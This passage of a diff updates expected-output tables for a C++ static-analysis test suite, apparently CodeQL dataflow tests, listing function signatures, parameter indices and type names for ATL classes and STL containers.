(const_iterator,InputIt,InputIt) | list | insert | 1 | +| stl.h:189:42:189:47 | insert | (const_iterator,InputIt,InputIt) | list | insert | 2 | +| stl.h:189:42:189:47 | insert | (const_iterator,InputIt,InputIt) | vector | insert | 0 | +| stl.h:189:42:189:47 | insert | (const_iterator,InputIt,InputIt) | vector | insert | 1 | +| stl.h:189:42:189:47 | insert | (const_iterator,InputIt,InputIt) | vector | insert | 2 | | stl.h:190:17:190:23 | replace | (const_iterator,InputIt,InputIt) | deque | insert | 0 | | stl.h:190:17:190:23 | replace | (const_iterator,InputIt,InputIt) | deque | insert | 1 | | stl.h:190:17:190:23 | replace | (const_iterator,InputIt,InputIt) | deque | insert | 2 | @@ -267,7 +373,24 @@ signatureMatches | stl.h:678:33:678:38 | format | (format_string,Args &&) | | format | 1 | | stl.h:683:6:683:48 | same_signature_as_format_but_different_name | (format_string,Args &&) | | format | 0 | | stl.h:683:6:683:48 | same_signature_as_format_but_different_name | (format_string,Args &&) | | format | 1 | +| string.cpp:20:6:20:9 | sink | (char) | CComBSTR | Append | 0 | +| taint.cpp:4:6:4:21 | arithAssignments | (LPCOLESTR,int) | CComBSTR | Append | 1 | +| taint.cpp:249:13:249:13 | _FUN | (LPCOLESTR,int) | CComBSTR | Append | 1 | +| taint.cpp:249:13:249:13 | operator() | (LPCOLESTR,int) | CComBSTR | Append | 1 | +| taint.cpp:302:6:302:14 | myAssign2 | (LPCOLESTR,int) | CComBSTR | Append | 1 | +| taint.cpp:307:6:307:14 | myAssign3 | (LPCOLESTR,int) | CComBSTR | Append | 1 | +| taint.cpp:312:6:312:14 | myAssign4 | (LPCOLESTR,int) | CComBSTR | Append | 1 | +| taint.cpp:523:7:523:13 | _strset | (LPCOLESTR,int) | CComBSTR | Append | 1 | +| vector.cpp:333:6:333:35 | vector_iterator_assign_wrapper | (LPCOLESTR,int) | CComBSTR | Append | 1 | getSignatureParameterName +| (CAtlFile &) | CAtlFile | CAtlFile | 0 | CAtlFile & | +| (CRegKey&) | CRegKey | CRegKey | 0 | CRegKey& | +| (DWORD&,LPCTSTR) | CRegKey | QueryValue | 0 | DWORD& | +| (DWORD&,LPCTSTR) | CRegKey | QueryValue | 1 | LPCTSTR | +| (HANDLE) | CAtlFile | CAtlFile | 0 | HANDLE | +| (HINSTANCE,UINT) | CComBSTR | LoadString | 0 | HINSTANCE | +| (HINSTANCE,UINT) | CComBSTR | LoadString | 1 | UINT | +| (HKEY) | CRegKey | CRegKey | 0 | HKEY | | (InputIt,InputIt) | deque | assign | 0 | func:0 | | (InputIt,InputIt) | deque | assign | 1 | func:0 | | (InputIt,InputIt) | forward_list | assign | 0 | func:0 | @@ -288,6 +411,35 @@ getSignatureParameterName | (InputIterator,InputIterator,const Allocator &) | vector | vector | 0 | func:0 | | (InputIterator,InputIterator,const Allocator &) | vector | vector | 1 | func:0 | | (InputIterator,InputIterator,const Allocator &) | vector | vector | 2 | const class:1 & | +| (LPCOLESTR) | CComBSTR | Append | 0 | LPCOLESTR | +| (LPCOLESTR) | CComBSTR | CComBSTR | 0 | LPCOLESTR | +| (LPCOLESTR,int) | CComBSTR | Append | 0 | LPCOLESTR | +| (LPCOLESTR,int) | CComBSTR | Append | 1 | int | +| (LPCSTR) | CComBSTR | Append | 0 | LPCSTR | +| (LPCSTR) | CComBSTR | CComBSTR | 0 | LPCSTR | +| (LPCTSTR) | _U_STRINGorID | _U_STRINGorID | 0 | LPCTSTR | +| (LPCTSTR,DWORD *,void *,ULONG *) | CRegKey | QueryValue | 0 | LPCTSTR | +| (LPCTSTR,DWORD *,void *,ULONG *) | CRegKey | QueryValue | 1 | DWORD * | +| (LPCTSTR,DWORD *,void *,ULONG *) | CRegKey | QueryValue | 2 | void * | +| (LPCTSTR,DWORD *,void *,ULONG *) | CRegKey | QueryValue | 3 | ULONG * | +| (LPTSTR,LPCTSTR,DWORD *) | CRegKey | QueryValue | 0 | LPTSTR | +| (LPTSTR,LPCTSTR,DWORD *) | CRegKey | QueryValue | 1 | LPCTSTR | +| (LPTSTR,LPCTSTR,DWORD *) | CRegKey | QueryValue | 2 | DWORD * | +| (UINT) | CComBSTR | LoadString | 0 | UINT | +| (UINT) | _U_STRINGorID | _U_STRINGorID | 0 | UINT | +| (char) | CComBSTR | Append | 0 | char | +| (const CComBSTR&) | CComBSTR | Append | 0 | const CComBSTR& | +| (const CComBSTR&) | CComBSTR | CComBSTR | 0 | const CComBSTR& | +| (const CComSafeArray &) | CComSafeArray | CComSafeArray | 0 | const CComSafeArray & | +| (const CComSafeArray&) | CComSafeArray | operator= | 0 | const CComSafeArray& | +| (const SAFEARRAY &) | CComSafeArray | CComSafeArray | 0 | const SAFEARRAY & | +| (const SAFEARRAY *) | CComSafeArray | Add | 0 | const SAFEARRAY * | +| (const SAFEARRAY *) | CComSafeArray | CComSafeArray | 0 | const SAFEARRAY * | +| (const SAFEARRAY *) | CComSafeArray | operator= | 0 | const SAFEARRAY * | +| (const SAFEARRAYBOUND *,UINT) | CComSafeArray | Create | 0 | const SAFEARRAYBOUND * | +| (const SAFEARRAYBOUND *,UINT) | CComSafeArray | Create | 1 | UINT | +| (const T &,BOOL) | CComSafeArray | Add | 0 | const class:0 & | +| (const T &,BOOL) | CComSafeArray | Add | 1 | BOOL | | (const deque &) | deque | deque | 0 | const deque & | | (const deque &,const Allocator &) | deque | deque | 0 | const deque & | | (const deque &,const Allocator &) | deque | deque | 1 | const class:1 & | @@ -348,6 +500,10 @@ getSignatureParameterName | (forward_list &&) | forward_list | forward_list | 0 | forward_list && | | (forward_list &&,const Allocator &) | forward_list | forward_list | 0 | forward_list && | | (forward_list &&,const Allocator &) | forward_list | forward_list | 1 | const class:1 & | +| (int,LPCOLESTR) | CComBSTR | CComBSTR | 0 | int | +| (int,LPCOLESTR) | CComBSTR | CComBSTR | 1 | LPCOLESTR | +| (int,LPCSTR) | CComBSTR | CComBSTR | 0 | int | +| (int,LPCSTR) | CComBSTR | CComBSTR | 1 | LPCSTR | | (list &&) | list | list | 0 | list && | | (list &&,const Allocator &) | list | list | 0 | list && | | (list &&,const Allocator &) | list | list | 1 | const class:1 & | @@ -374,15 +530,303 @@ getSignatureParameterName | (vector &&) | vector | vector | 0 | vector && | | (vector &&,const Allocator &) | vector | vector | 0 | vector && | | (vector &&,const Allocator &) | vector | vector | 1 | const class:1 & | +| (wchar_t) | CComBSTR | Append | 0 | wchar_t | getParameterTypeName +| arrayassignment.cpp:3:6:3:9 | sink | 0 | int | +| arrayassignment.cpp:4:6:4:9 | sink | 0 | MyInt | +| arrayassignment.cpp:5:6:5:9 | sink | 0 | MyArray | +| arrayassignment.cpp:37:7:37:7 | MyInt | 0 | const MyInt & | +| arrayassignment.cpp:44:9:44:17 | operator= | 0 | const int & | +| arrayassignment.cpp:45:9:45:17 | operator= | 0 | const MyInt & | +| arrayassignment.cpp:83:7:83:7 | MyArray | 0 | MyArray && | +| arrayassignment.cpp:83:7:83:7 | MyArray | 0 | const MyArray & | +| arrayassignment.cpp:83:7:83:7 | operator= | 0 | MyArray && | +| arrayassignment.cpp:83:7:83:7 | operator= | 0 | const MyArray & | +| arrayassignment.cpp:88:7:88:9 | get | 0 | int | +| arrayassignment.cpp:90:7:90:16 | operator[] | 0 | int | +| arrayassignment.cpp:124:6:124:9 | sink | 0 | int * | +| atl.cpp:28:8:28:8 | operator= | 0 | __POSITION && | +| atl.cpp:28:8:28:8 | operator= | 0 | const __POSITION & | +| atl.cpp:49:16:49:16 | operator= | 0 | const tagSAFEARRAYBOUND & | +| atl.cpp:49:16:49:16 | operator= | 0 | tagSAFEARRAYBOUND && | +| atl.cpp:54:16:54:16 | operator= | 0 | const tagVARIANT & | +| atl.cpp:54:16:54:16 | operator= | 0 | tagVARIANT && | +| atl.cpp:58:16:58:16 | operator= | 0 | const tagSAFEARRAY & | +| atl.cpp:58:16:58:16 | operator= | 0 | tagSAFEARRAY && | +| atl.cpp:67:8:67:8 | _U_STRINGorID | 0 | _U_STRINGorID && | +| atl.cpp:67:8:67:8 | _U_STRINGorID | 0 | const _U_STRINGorID & | +| atl.cpp:67:8:67:8 | operator= | 0 | _U_STRINGorID && | +| atl.cpp:67:8:67:8 | operator= | 0 | const _U_STRINGorID & | +| atl.cpp:68:3:68:15 | _U_STRINGorID | 0 | UINT | +| atl.cpp:69:3:69:15 | _U_STRINGorID | 0 | LPCTSTR | +| atl.cpp:193:10:193:12 | Add | 0 | INARGTYPclass:0 | +| atl.cpp:195:10:195:15 | Append | 0 | const CAtlArray & | +| atl.cpp:195:10:195:15 | Append | 0 | const CAtlArray> & | +| atl.cpp:196:8:196:11 | Copy | 0 | const CAtlArray & | +| atl.cpp:196:8:196:11 | Copy | 0 | const CAtlArray> & | +| atl.cpp:198:6:198:10 | GetAt | 0 | size_t | +| atl.cpp:202:8:202:20 | InsertArrayAt | 0 | size_t | +| atl.cpp:202:8:202:20 | InsertArrayAt | 1 | const CAtlArray * | +| atl.cpp:202:8:202:20 | InsertArrayAt | 1 | const CAtlArray> * | +| atl.cpp:203:8:203:15 | InsertAt | 0 | size_t | +| atl.cpp:203:8:203:15 | InsertAt | 1 | INARGTYPclass:0 | +| atl.cpp:203:8:203:15 | InsertAt | 2 | size_t | +| atl.cpp:208:8:208:16 | SetAtGrow | 0 | size_t | +| atl.cpp:208:8:208:16 | SetAtGrow | 1 | INARGTYPclass:0 | +| atl.cpp:210:6:210:15 | operator[] | 0 | size_t | +| atl.cpp:256:3:256:10 | CAtlList | 0 | UINT | +| atl.cpp:259:12:259:18 | AddHead | 0 | INARGTYPclass:0 | +| atl.cpp:260:8:260:18 | AddHeadList | 0 | const CAtlList * | +| atl.cpp:260:8:260:18 | AddHeadList | 0 | const CAtlList> * | +| atl.cpp:262:12:262:18 | AddTail | 0 | INARGTYPclass:0 | +| atl.cpp:263:8:263:18 | AddTailList | 0 | const CAtlList * | +| atl.cpp:263:8:263:18 | AddTailList | 0 | const CAtlList> * | +| atl.cpp:264:12:264:15 | Find | 0 | INARGTYPclass:0 | +| atl.cpp:264:12:264:15 | Find | 1 | POSITION | +| atl.cpp:265:12:265:20 | FindIndex | 0 | size_t | +| atl.cpp:266:6:266:10 | GetAt | 0 | POSITION | +| atl.cpp:279:12:279:22 | InsertAfter | 0 | POSITION | +| atl.cpp:279:12:279:22 | InsertAfter | 1 | INARGTYPclass:0 | +| atl.cpp:280:12:280:23 | InsertBefore | 0 | POSITION | +| atl.cpp:280:12:280:23 | InsertBefore | 1 | INARGTYPclass:0 | +| atl.cpp:290:8:290:12 | SetAt | 0 | POSITION | +| atl.cpp:290:8:290:12 | SetAt | 1 | INARGTYPclass:0 | +| atl.cpp:400:8:400:8 | operator= | 0 | IUnknown && | +| atl.cpp:400:8:400:8 | operator= | 0 | const IUnknown & | +| atl.cpp:402:8:402:8 | operator= | 0 | ISequentialStream && | +| atl.cpp:402:8:402:8 | operator= | 0 | const ISequentialStream & | +| atl.cpp:404:8:404:8 | operator= | 0 | IStream && | +| atl.cpp:404:8:404:8 | operator= | 0 | const IStream & | +| atl.cpp:406:8:406:8 | operator= | 0 | const CComBSTR & | +| atl.cpp:408:3:408:10 | CComBSTR | 0 | const CComBSTR & | +| atl.cpp:409:3:409:10 | CComBSTR | 0 | int | +| atl.cpp:410:3:410:10 | CComBSTR | 0 | int | +| atl.cpp:410:3:410:10 | CComBSTR | 1 | LPCOLESTR | +| atl.cpp:411:3:411:10 | CComBSTR | 0 | int | +| atl.cpp:411:3:411:10 | CComBSTR | 1 | LPCSTR | +| atl.cpp:412:3:412:10 | CComBSTR | 0 | LPCOLESTR | +| atl.cpp:413:3:413:10 | CComBSTR | 0 | LPCSTR | +| atl.cpp:414:3:414:10 | CComBSTR | 0 | CComBSTR && | +| atl.cpp:417:11:417:16 | Append | 0 | const CComBSTR & | +| atl.cpp:418:11:418:16 | Append | 0 | wchar_t | +| atl.cpp:419:11:419:16 | Append | 0 | char | +| atl.cpp:420:11:420:16 | Append | 0 | LPCOLESTR | +| atl.cpp:421:11:421:16 | Append | 0 | LPCSTR | +| atl.cpp:422:11:422:16 | Append | 0 | LPCOLESTR | +| atl.cpp:422:11:422:16 | Append | 1 | int | +| atl.cpp:423:11:423:20 | AppendBSTR | 0 | BSTR | +| atl.cpp:424:11:424:21 | AppendBytes | 0 | const char * | +| atl.cpp:424:11:424:21 | AppendBytes | 1 | int | +| atl.cpp:425:11:425:21 | ArrayToBSTR | 0 | const SAFEARRAY * | +| atl.cpp:426:11:426:20 | AssignBSTR | 0 | const BSTR | +| atl.cpp:427:8:427:13 | Attach | 0 | BSTR | +| atl.cpp:428:11:428:21 | BSTRToArray | 0 | LPSAFEARRAY | +| atl.cpp:431:11:431:16 | CopyTo | 0 | BSTR * | +| atl.cpp:433:11:433:16 | CopyTo | 0 | VARIANT * | +| atl.cpp:437:8:437:17 | LoadString | 0 | HINSTANCE | +| atl.cpp:437:8:437:17 | LoadString | 1 | UINT | +| atl.cpp:438:8:438:17 | LoadString | 0 | UINT | +| atl.cpp:439:11:439:24 | ReadFromStream | 0 | IStream * | +| atl.cpp:441:11:441:23 | WriteToStream | 0 | IStream * | +| atl.cpp:446:13:446:22 | operator+= | 0 | const CComBSTR & | +| atl.cpp:447:13:447:22 | operator+= | 0 | LPCOLESTR | +| atl.cpp:537:3:537:15 | CComSafeArray | 0 | const SAFEARRAY * | +| atl.cpp:541:11:541:13 | Add | 0 | const SAFEARRAY * | +| atl.cpp:543:11:543:13 | Add | 0 | const class:0 & | +| atl.cpp:543:11:543:13 | Add | 0 | const int & | +| atl.cpp:543:11:543:13 | Add | 1 | BOOL | +| atl.cpp:551:6:551:10 | GetAt | 0 | LONG | +| atl.cpp:562:11:562:15 | SetAt | 0 | LONG | +| atl.cpp:562:11:562:15 | SetAt | 1 | const class:0 & | +| atl.cpp:562:11:562:15 | SetAt | 1 | const int & | +| atl.cpp:562:11:562:15 | SetAt | 2 | BOOL | +| atl.cpp:564:6:564:15 | operator[] | 0 | long | +| atl.cpp:565:6:565:15 | operator[] | 0 | int | +| atl.cpp:609:3:609:8 | CPathT | 0 | PCXSTR | +| atl.cpp:610:3:610:8 | CPathT | 0 | const CPathT & | +| atl.cpp:614:8:614:19 | AddExtension | 0 | PCXSTR | +| atl.cpp:615:8:615:13 | Append | 0 | PCXSTR | +| atl.cpp:618:8:618:14 | Combine | 0 | PCXSTR | +| atl.cpp:618:8:618:14 | Combine | 1 | PCXSTR | +| atl.cpp:619:22:619:33 | CommonPrefix | 0 | PCXSTR | +| atl.cpp:656:23:656:32 | operator+= | 0 | PCXSTR | +| atl.cpp:716:8:716:10 | Add | 0 | const class:0 & | +| atl.cpp:716:8:716:10 | Add | 0 | const int & | +| atl.cpp:717:7:717:10 | Find | 0 | const class:0 & | +| atl.cpp:717:7:717:10 | Find | 0 | const int & | +| atl.cpp:728:6:728:15 | operator[] | 0 | int | +| atl.cpp:729:21:729:29 | operator= | 0 | const CSimpleArray & | +| atl.cpp:762:8:762:10 | Add | 0 | char *const & | +| atl.cpp:762:8:762:10 | Add | 0 | const class:0 & | +| atl.cpp:762:8:762:10 | Add | 1 | const class:1 & | +| atl.cpp:762:8:762:10 | Add | 1 | wchar_t *const & | +| atl.cpp:763:7:763:13 | FindKey | 0 | char *const & | +| atl.cpp:763:7:763:13 | FindKey | 0 | const class:0 & | +| atl.cpp:764:7:764:13 | FindVal | 0 | const class:1 & | +| atl.cpp:764:7:764:13 | FindVal | 0 | wchar_t *const & | +| atl.cpp:767:9:767:18 | GetValueAt | 0 | int | +| atl.cpp:768:8:768:13 | Lookup | 0 | char *const & | +| atl.cpp:768:8:768:13 | Lookup | 0 | const class:0 & | +| atl.cpp:772:8:772:20 | ReverseLookup | 0 | const class:1 & | +| atl.cpp:772:8:772:20 | ReverseLookup | 0 | wchar_t *const & | +| atl.cpp:773:8:773:12 | SetAt | 0 | char *const & | +| atl.cpp:773:8:773:12 | SetAt | 0 | const class:0 & | +| atl.cpp:773:8:773:12 | SetAt | 1 | const class:1 & | +| atl.cpp:773:8:773:12 | SetAt | 1 | wchar_t *const & | +| atl.cpp:774:8:774:17 | SetAtIndex | 0 | int | +| atl.cpp:774:8:774:17 | SetAtIndex | 1 | char *const & | +| atl.cpp:774:8:774:17 | SetAtIndex | 1 | const class:0 & | +| atl.cpp:774:8:774:17 | SetAtIndex | 2 | const class:1 & | +| atl.cpp:774:8:774:17 | SetAtIndex | 2 | wchar_t *const & | +| atl.cpp:813:9:813:17 | operator= | 0 | const CUrl & | +| atl.cpp:815:3:815:6 | CUrl | 0 | const CUrl & | +| atl.cpp:818:15:818:26 | Canonicalize | 0 | DWORD | +| atl.cpp:821:8:821:15 | CrackUrl | 0 | LPCTSTR | +| atl.cpp:821:8:821:15 | CrackUrl | 1 | DWORD | +| atl.cpp:822:15:822:23 | CreateUrl | 0 | LPTSTR | +| atl.cpp:822:15:822:23 | CreateUrl | 1 | DWORD * | +| atl.cpp:822:15:822:23 | CreateUrl | 2 | DWORD | +| atl.cpp:839:15:839:26 | SetExtraInfo | 0 | LPCTSTR | +| atl.cpp:840:15:840:25 | SetHostName | 0 | LPCTSTR | +| atl.cpp:841:15:841:25 | SetPassword | 0 | LPCTSTR | +| atl.cpp:842:15:842:27 | SetPortNumber | 0 | ATL_URL_PORT | +| atl.cpp:843:15:843:23 | SetScheme | 0 | ATL_URL_SCHEME | +| atl.cpp:844:15:844:27 | SetSchemeName | 0 | LPCTSTR | +| atl.cpp:845:15:845:24 | SetUrlPath | 0 | LPCTSTR | +| atl.cpp:846:15:846:25 | SetUserName | 0 | LPCTSTR | +| bsd.cpp:6:8:6:8 | operator= | 0 | const sockaddr & | +| bsd.cpp:6:8:6:8 | operator= | 0 | sockaddr && | +| bsd.cpp:12:5:12:10 | accept | 0 | int | +| bsd.cpp:12:5:12:10 | accept | 1 | sockaddr * | +| bsd.cpp:12:5:12:10 | accept | 2 | int * | +| bsd.cpp:14:6:14:9 | sink | 0 | sockaddr | +| constructor_delegation.cpp:5:7:5:7 | MyValue | 0 | MyValue && | +| constructor_delegation.cpp:5:7:5:7 | MyValue | 0 | const MyValue & | +| constructor_delegation.cpp:5:7:5:7 | operator= | 0 | MyValue && | +| constructor_delegation.cpp:5:7:5:7 | operator= | 0 | const MyValue & | +| constructor_delegation.cpp:8:2:8:8 | MyValue | 0 | int | +| constructor_delegation.cpp:9:2:9:8 | MyValue | 0 | int | +| constructor_delegation.cpp:9:2:9:8 | MyValue | 1 | bool | +| constructor_delegation.cpp:10:2:10:8 | MyValue | 0 | int | +| constructor_delegation.cpp:10:2:10:8 | MyValue | 1 | int | +| constructor_delegation.cpp:11:2:11:8 | MyValue | 0 | int | +| constructor_delegation.cpp:11:2:11:8 | MyValue | 1 | bool | +| constructor_delegation.cpp:11:2:11:8 | MyValue | 2 | bool | +| constructor_delegation.cpp:16:7:16:7 | MyDerivedValue | 0 | MyDerivedValue && | +| constructor_delegation.cpp:16:7:16:7 | MyDerivedValue | 0 | const MyDerivedValue & | +| constructor_delegation.cpp:16:7:16:7 | operator= | 0 | MyDerivedValue && | +| constructor_delegation.cpp:16:7:16:7 | operator= | 0 | const MyDerivedValue & | +| constructor_delegation.cpp:19:2:19:15 | MyDerivedValue | 0 | bool | +| constructor_delegation.cpp:19:2:19:15 | MyDerivedValue | 1 | int | +| copyableclass.cpp:8:2:8:16 | MyCopyableClass | 0 | int | +| copyableclass.cpp:9:2:9:16 | MyCopyableClass | 0 | const MyCopyableClass & | +| copyableclass.cpp:10:19:10:27 | operator= | 0 | const MyCopyableClass & | +| copyableclass_declonly.cpp:8:2:8:24 | MyCopyableClassDeclOnly | 0 | int | +| copyableclass_declonly.cpp:9:2:9:24 | MyCopyableClassDeclOnly | 0 | const MyCopyableClassDeclOnly & | +| copyableclass_declonly.cpp:10:27:10:35 | operator= | 0 | const MyCopyableClassDeclOnly & | +| file://:0:0:0:0 | operator delete | 0 | void * | +| file://:0:0:0:0 | operator new | 0 | unsigned long | +| file://:0:0:0:0 | operator= | 0 | __va_list_tag && | +| file://:0:0:0:0 | operator= | 0 | const __va_list_tag & | +| format.cpp:3:16:3:16 | operator= | 0 | FILE && | +| format.cpp:3:16:3:16 | operator= | 0 | const FILE & | +| format.cpp:5:5:5:12 | snprintf | 0 | char * | +| format.cpp:5:5:5:12 | snprintf | 1 | size_t | +| format.cpp:5:5:5:12 | snprintf | 2 | const char * | +| format.cpp:6:5:6:11 | sprintf | 0 | char * | +| format.cpp:6:5:6:11 | sprintf | 1 | const char * | +| format.cpp:7:5:7:12 | swprintf | 0 | wchar_t * | +| format.cpp:7:5:7:12 | swprintf | 1 | size_t | +| format.cpp:7:5:7:12 | swprintf | 2 | const wchar_t * | +| format.cpp:14:5:14:13 | vsnprintf | 0 | char * | +| format.cpp:14:5:14:13 | vsnprintf | 1 | size_t | +| format.cpp:14:5:14:13 | vsnprintf | 2 | const char * | +| format.cpp:14:5:14:13 | vsnprintf | 3 | va_list | +| format.cpp:16:5:16:13 | mysprintf | 0 | char * | +| format.cpp:16:5:16:13 | mysprintf | 1 | size_t | +| format.cpp:16:5:16:13 | mysprintf | 2 | const char * | +| format.cpp:28:5:28:10 | sscanf | 0 | const char * | +| format.cpp:28:5:28:10 | sscanf | 1 | const char * | +| format.cpp:142:8:142:13 | strlen | 0 | const char * | +| format.cpp:143:8:143:13 | wcslen | 0 | const wchar_t * | +| format.cpp:169:6:169:9 | test | 0 | format_string | +| map.cpp:8:6:8:9 | sink | 0 | char * | +| map.cpp:9:6:9:9 | sink | 0 | const char * | +| map.cpp:10:6:10:9 | sink | 0 | bool | +| map.cpp:11:6:11:9 | sink | 0 | pair | +| map.cpp:12:6:12:9 | sink | 0 | map, allocator>> | +| map.cpp:13:6:13:9 | sink | 0 | iterator | +| map.cpp:14:6:14:9 | sink | 0 | unordered_map, equal_to, allocator>> | +| map.cpp:15:6:15:9 | sink | 0 | iterator | +| map.cpp:16:6:16:9 | sink | 0 | unordered_map, hash, equal_to, allocator>>> | +| map.cpp:17:6:17:9 | sink | 0 | iterator | +| map.cpp:442:7:442:19 | indirect_sink | 0 | int * | +| movableclass.cpp:5:7:5:7 | MyMovableClass | 0 | const MyMovableClass & | +| movableclass.cpp:5:7:5:7 | operator= | 0 | const MyMovableClass & | +| movableclass.cpp:8:2:8:15 | MyMovableClass | 0 | int | +| movableclass.cpp:9:2:9:15 | MyMovableClass | 0 | MyMovableClass && | +| movableclass.cpp:13:18:13:26 | operator= | 0 | MyMovableClass && | +| set.cpp:8:6:8:9 | sink | 0 | char * | +| set.cpp:9:6:9:9 | sink | 0 | set, allocator> | +| set.cpp:10:6:10:9 | sink | 0 | iterator | +| set.cpp:11:6:11:9 | sink | 0 | unordered_set, equal_to, allocator> | +| set.cpp:12:6:12:9 | sink | 0 | iterator | +| smart_pointer.cpp:4:6:4:9 | sink | 0 | int | +| smart_pointer.cpp:5:6:5:9 | sink | 0 | int * | | smart_pointer.cpp:7:27:7:30 | sink | 0 | shared_ptr & | | smart_pointer.cpp:7:27:7:30 | sink | 0 | shared_ptr & | | smart_pointer.cpp:8:27:8:30 | sink | 0 | unique_ptr & | | smart_pointer.cpp:8:27:8:30 | sink | 0 | unique_ptr & | +| smart_pointer.cpp:60:8:60:8 | operator= | 0 | A && | +| smart_pointer.cpp:60:8:60:8 | operator= | 0 | const A & | +| smart_pointer.cpp:70:6:70:14 | getNumber | 0 | shared_ptr | +| smart_pointer.cpp:80:8:80:8 | operator= | 0 | B && | +| smart_pointer.cpp:80:8:80:8 | operator= | 0 | const B & | +| smart_pointer.cpp:86:6:86:24 | test_operator_arrow | 0 | unique_ptr | +| smart_pointer.cpp:86:6:86:24 | test_operator_arrow | 1 | unique_ptr | +| smart_pointer.cpp:97:6:97:12 | taint_x | 0 | A * | +| smart_pointer.cpp:107:8:107:8 | C | 0 | C && | +| smart_pointer.cpp:107:8:107:8 | C | 0 | const C & | +| smart_pointer.cpp:107:8:107:8 | operator= | 0 | C && | +| smart_pointer.cpp:107:8:107:8 | operator= | 0 | const C & | +| smart_pointer.cpp:112:6:112:19 | taint_x_shared | 0 | shared_ptr | +| smart_pointer.cpp:116:6:116:24 | taint_x_shared_cref | 0 | const shared_ptr & | +| smart_pointer.cpp:120:6:120:18 | getNumberCRef | 0 | const shared_ptr & | +| smart_pointer.cpp:124:5:124:27 | nested_shared_ptr_taint | 0 | shared_ptr | +| smart_pointer.cpp:124:5:124:27 | nested_shared_ptr_taint | 1 | unique_ptr> | +| smart_pointer.cpp:132:5:132:32 | nested_shared_ptr_taint_cref | 0 | shared_ptr | +| smart_pointer.cpp:132:5:132:32 | nested_shared_ptr_taint_cref | 1 | unique_ptr> | +| standalone_iterators.cpp:5:6:5:9 | sink | 0 | int | +| standalone_iterators.cpp:7:7:7:7 | operator= | 0 | const int_iterator_by_typedefs & | +| standalone_iterators.cpp:7:7:7:7 | operator= | 0 | int_iterator_by_typedefs && | +| standalone_iterators.cpp:16:30:16:39 | operator++ | 0 | int | +| standalone_iterators.cpp:20:7:20:7 | operator= | 0 | const int_iterator_by_trait & | +| standalone_iterators.cpp:20:7:20:7 | operator= | 0 | int_iterator_by_trait && | +| standalone_iterators.cpp:23:27:23:36 | operator++ | 0 | int | +| standalone_iterators.cpp:36:7:36:7 | operator= | 0 | const non_iterator & | +| standalone_iterators.cpp:36:7:36:7 | operator= | 0 | non_iterator && | +| standalone_iterators.cpp:39:18:39:27 | operator++ | 0 | int | +| standalone_iterators.cpp:43:6:43:18 | test_typedefs | 0 | int_iterator_by_typedefs | +| standalone_iterators.cpp:49:6:49:15 | test_trait | 0 | int_iterator_by_trait | +| standalone_iterators.cpp:55:6:55:22 | test_non_iterator | 0 | non_iterator | +| standalone_iterators.cpp:63:7:63:7 | operator= | 0 | const insert_iterator_by_trait & | +| standalone_iterators.cpp:63:7:63:7 | operator= | 0 | insert_iterator_by_trait && | +| standalone_iterators.cpp:66:30:66:39 | operator++ | 0 | int | +| standalone_iterators.cpp:68:30:68:39 | operator-- | 0 | int | +| standalone_iterators.cpp:70:31:70:39 | operator= | 0 | int | +| standalone_iterators.cpp:82:7:82:7 | container | 0 | const container & | +| standalone_iterators.cpp:82:7:82:7 | container | 0 | container && | +| standalone_iterators.cpp:82:7:82:7 | operator= | 0 | const container & | +| standalone_iterators.cpp:82:7:82:7 | operator= | 0 | container && | +| standalone_iterators.cpp:88:6:88:9 | sink | 0 | container | +| standalone_iterators.cpp:102:6:102:9 | sink | 0 | insert_iterator_by_trait | +| standalone_iterators.cpp:103:27:103:36 | operator+= | 0 | insert_iterator_by_trait & | +| standalone_iterators.cpp:103:27:103:36 | operator+= | 1 | int | | stl.h:29:34:29:40 | forward | 0 | remove_reference_t & | | stl.h:29:34:29:40 | forward | 0 | remove_reference_t & | | stl.h:29:34:29:40 | forward | 0 | remove_reference_t & | | stl.h:29:34:29:40 | forward | 0 | remove_reference_t & | +| stl.h:29:34:29:40 | forward | 0 | remove_reference_t> & | | stl.h:49:3:49:10 | iterator | 0 | const iterator & | | stl.h:49:3:49:10 | iterator | 0 | const iterator & | | stl.h:49:3:49:10 | iterator | 0 | const iterator & | @@ -391,6 +835,8 @@ getParameterTypeName | stl.h:49:3:49:10 | iterator | 0 | const iterator & | | stl.h:49:3:49:10 | iterator | 0 | const iterator & | | stl.h:49:3:49:10 | iterator | 0 | const iterator & | +| stl.h:49:3:49:10 | iterator | 0 | const iterator, ptrdiff_t, pair *, pair &> & | +| stl.h:49:3:49:10 | iterator | 0 | const iterator, ptrdiff_t, pair *, pair &> & | | stl.h:52:12:52:21 | operator++ | 0 | int | | stl.h:52:12:52:21 | operator++ | 0 | int | | stl.h:52:12:52:21 | operator++ | 0 | int | @@ -403,59 +849,111 @@ getParameterTypeName | stl.h:56:8:56:17 | operator!= | 0 | iterator | | stl.h:56:8:56:17 | operator!= | 0 | iterator | | stl.h:56:8:56:17 | operator!= | 0 | iterator | +| stl.h:56:8:56:17 | operator!= | 0 | iterator, ptrdiff_t, pair *, pair &> | | stl.h:59:12:59:20 | operator+ | 0 | int | | stl.h:60:12:60:20 | operator- | 0 | int | | stl.h:61:13:61:22 | operator+= | 0 | int | | stl.h:61:13:61:22 | operator+= | 0 | int | | stl.h:62:13:62:22 | operator-= | 0 | int | | stl.h:64:18:64:27 | operator[] | 0 | int | +| stl.h:67:9:67:9 | operator= | 0 | const input_iterator_tag & | +| stl.h:67:9:67:9 | operator= | 0 | input_iterator_tag && | +| stl.h:68:9:68:9 | operator= | 0 | const forward_iterator_tag & | +| stl.h:68:9:68:9 | operator= | 0 | forward_iterator_tag && | +| stl.h:69:9:69:9 | operator= | 0 | bidirectional_iterator_tag && | +| stl.h:69:9:69:9 | operator= | 0 | const bidirectional_iterator_tag & | +| stl.h:70:9:70:9 | operator= | 0 | const random_access_iterator_tag & | +| stl.h:70:9:70:9 | operator= | 0 | random_access_iterator_tag && | +| stl.h:72:9:72:9 | operator= | 0 | const output_iterator_tag & | +| stl.h:72:9:72:9 | operator= | 0 | output_iterator_tag && | | stl.h:86:22:86:41 | back_insert_iterator | 0 | class:0 & | | stl.h:86:22:86:41 | back_insert_iterator | 0 | class:0 & | +| stl.h:86:22:86:41 | back_insert_iterator | 0 | vector, allocator>, allocator, allocator>>> & | +| stl.h:86:22:86:41 | back_insert_iterator | 0 | vector> & | | stl.h:88:25:88:33 | operator= | 0 | value_type && | | stl.h:88:25:88:33 | operator= | 0 | value_type && | | stl.h:91:24:91:33 | operator++ | 0 | int | | stl.h:91:24:91:33 | operator++ | 0 | int | | stl.h:95:44:95:44 | back_inserter | 0 | func:0 & | | stl.h:95:44:95:44 | back_inserter | 0 | func:0 & | +| stl.h:95:44:95:44 | 